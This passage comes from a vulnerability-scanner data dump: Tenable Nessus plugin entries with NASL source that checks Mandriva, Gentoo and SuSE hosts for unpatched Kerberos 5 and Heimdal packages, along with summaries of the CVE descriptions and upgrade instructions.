value:\"p-cpe:/a:mandriva:linux:ftp-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64krb53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libkrb53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", reference:\"ftp-client-krb5-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"ftp-server-krb5-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"krb5-server-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"krb5-workstation-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64krb53-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64krb53-devel-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libkrb53-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libkrb53-devel-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"telnet-client-krb5-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"telnet-server-krb5-1.4.2-1.1.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:10", "description": "The remote host is affected by the vulnerability described in GLSA-200608-15 (MIT Kerberos 5: Multiple local privilege escalation vulnerabilities)\n\n Unchecked calls to setuid() in krshd and v4rcp, as well as unchecked calls to seteuid() in kftpd and in ksu, have been found in the MIT Kerberos 5 program suite and may lead to a local root privilege escalation.\n Impact :\n\n A local attacker could exploit this vulnerability to execute arbitrary code with elevated privileges.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2006-08-14T00:00:00", "type": "nessus", "title": "GLSA-200608-15 : MIT Kerberos 5: Multiple local privilege escalation vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mit-krb5", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200608-15.NASL", "href": "https://www.tenable.com/plugins/nessus/22214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22214);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n script_bugtraq_id(19427);\n script_xref(name:\"GLSA\", value:\"200608-15\");\n\n script_name(english:\"GLSA-200608-15 : MIT Kerberos 5: Multiple local privilege escalation vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-15\n(MIT Kerberos 5: Multiple local privilege escalation vulnerabilities)\n\n Unchecked calls to setuid() in krshd and v4rcp, as well as unchecked\n calls to seteuid() in kftpd and in ksu, have been found in the MIT\n Kerberos 5 program suite and may lead to a local root privilege\n escalation.\n \nImpact :\n\n A local attacker could exploit this vulnerability to execute arbitrary\n code with elevated privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MIT Kerberos 5 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/mit-krb5-1.4.3-r3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mit-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-crypt/mit-krb5\", unaffected:make_list(\"ge 1.4.3-r3\"), vulnerable:make_list(\"lt 1.4.3-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MIT Kerberos 5\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:03", "description": "The remote host is affected by the vulnerability described in GLSA-200608-21 (Heimdal: Multiple local privilege escalation vulnerabilities)\n\n The ftpd and rcp applications provided by Heimdal fail to check the return value of calls to seteuid().\n Impact :\n\n A local attacker could exploit this vulnerability to execute arbitrary code with elevated privileges.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2006-08-30T00:00:00", "type": "nessus", "title": "GLSA-200608-21 : Heimdal: Multiple local privilege escalation vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:heimdal", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200608-21.NASL", "href": "https://www.tenable.com/plugins/nessus/22283", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-21.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22283);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n script_bugtraq_id(19427);\n script_xref(name:\"GLSA\", value:\"200608-21\");\n\n script_name(english:\"GLSA-200608-21 : Heimdal: Multiple local privilege escalation vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-21\n(Heimdal: Multiple local privilege escalation vulnerabilities)\n\n The ftpd and rcp applications provided by Heimdal fail to check the\n return value of calls to seteuid().\n \nImpact :\n\n A local attacker could exploit this vulnerability to execute arbitrary\n code with elevated privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://www.pdc.kth.se/heimdal/advisory/2006-08-08/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.pdc.kth.se/heimdal/advisory/2006-08-08/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-21\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Heimdal users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/heimdal-0.7.2-r3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:heimdal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-crypt/heimdal\", unaffected:make_list(\"ge 0.7.2-r3\"), vulnerable:make_list(\"lt 0.7.2-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Heimdal\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:03:36", "description": "Various return checks of setuid() and seteuid() calls have been fixed in kerberos client and server applications.\n\nIf these applications are setuid, it might have been possible for local attackers to gain root access. (CVE-2006-3083)\n\nWe are not affected by the seteuid() problems, tracked by CVE-2006-3084.", "cvss3": {}, "published": "2007-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : krb5-apps-servers and krb5-apps-clients (ZYPP Patch Number 1938)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KRB5-APPS-SERVERS-1938.NASL", "href": "https://www.tenable.com/plugins/nessus/29496", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29496);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3083\", \"CVE-2006-3084\");\n\n script_name(english:\"SuSE 10 Security Update : krb5-apps-servers and krb5-apps-clients (ZYPP Patch Number 1938)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various return checks of setuid() and seteuid() calls have been fixed\nin kerberos client and server applications.\n\nIf these applications are setuid, it might have been possible for\nlocal attackers to gain root access. (CVE-2006-3083)\n\nWe are not affected by the seteuid() problems, tracked by\nCVE-2006-3084.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3083.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 1938.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-apps-clients-1.4.3-19.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-apps-servers-1.4.3-19.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:03:07", "description": "A bug in the function krb5_klog_syslog() leads to a buffer overflow which could be exploited to execute arbitrary code. (CVE-2007-0957)\n\nA double-free bug in the GSS-API library could crash kadmind. It's potentially also exploitable to execute arbitrary code.\n(CVE-2007-1216)", "cvss3": {}, "published": "2007-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Kerberos 5 (ZYPP Patch Number 3046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KRB5-3046.NASL", "href": "https://www.tenable.com/plugins/nessus/29492", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29492);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-1216\");\n\n script_name(english:\"SuSE 10 Security Update : Kerberos 5 (ZYPP Patch Number 3046)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in the function krb5_klog_syslog() leads to a buffer overflow\nwhich could be exploited to execute arbitrary code. (CVE-2007-0957)\n\nA double-free bug in the GSS-API library could crash kadmind. It's\npotentially also exploitable to execute arbitrary code.\n(CVE-2007-1216)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-0957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-1216.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 3046.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"krb5-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"krb5-devel-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"krb5-32bit-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"krb5-devel-32bit-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-devel-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-server-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"krb5-32bit-1.4.3-19.10.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"krb5-devel-32bit-1.4.3-19.10.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:14", "description": "A bug in the function krb5_klog_syslog() leads to a buffer overflow which could be exploited to execute arbitrary code (CVE-2007-0957).\n\nA double-free bug in the GSS-API library could crash kadmind. It's potentially also exploitable to execute arbitrary code (CVE-2007-1216).", "cvss3": {}, "published": "2007-10-17T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : krb5 (krb5-3045)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-1216"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:krb5", "p-cpe:/a:novell:opensuse:krb5-32bit", "p-cpe:/a:novell:opensuse:krb5-devel", "p-cpe:/a:novell:opensuse:krb5-devel-32bit", "p-cpe:/a:novell:opensuse:krb5-server", "cpe:/o:novell:opensuse:10.1", "cpe:/o:novell:opensuse:10.2"], "id": "SUSE_KRB5-3045.NASL", "href": "https://www.tenable.com/plugins/nessus/27308", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update krb5-3045.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27308);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-1216\");\n\n script_name(english:\"openSUSE 10 Security Update : krb5 (krb5-3045)\");\n script_summary(english:\"Check for the krb5-3045 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in the function krb5_klog_syslog() leads to a buffer overflow\nwhich could be exploited to execute arbitrary code (CVE-2007-0957).\n\nA double-free bug in the GSS-API library could crash kadmind. It's\npotentially also exploitable to execute arbitrary code\n(CVE-2007-1216).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected krb5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1|SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1 / 10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-devel-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-server-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"krb5-32bit-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"krb5-devel-32bit-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"krb5-1.5.1-23.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"krb5-devel-1.5.1-23.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"krb5-server-1.5.1-23.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"krb5-32bit-1.5.1-23.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"krb5-devel-32bit-1.5.1-23.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5 / krb5-32bit / krb5-devel / krb5-devel-32bit / krb5-server\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:03:23", "description": "When using the krb5 telnet daemon it was possible for remote attackers to override authentication mechanisms and gain root access to the machine by supplying a special username. \n\nThis is tracked by the Mitre CVE ID CVE-2007-0956.", "cvss3": {}, "published": "2007-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : krb5-apps-servers (ZYPP Patch Number 3022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KRB5-APPS-SERVERS-3022.NASL", "href": "https://www.tenable.com/plugins/nessus/29497", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, 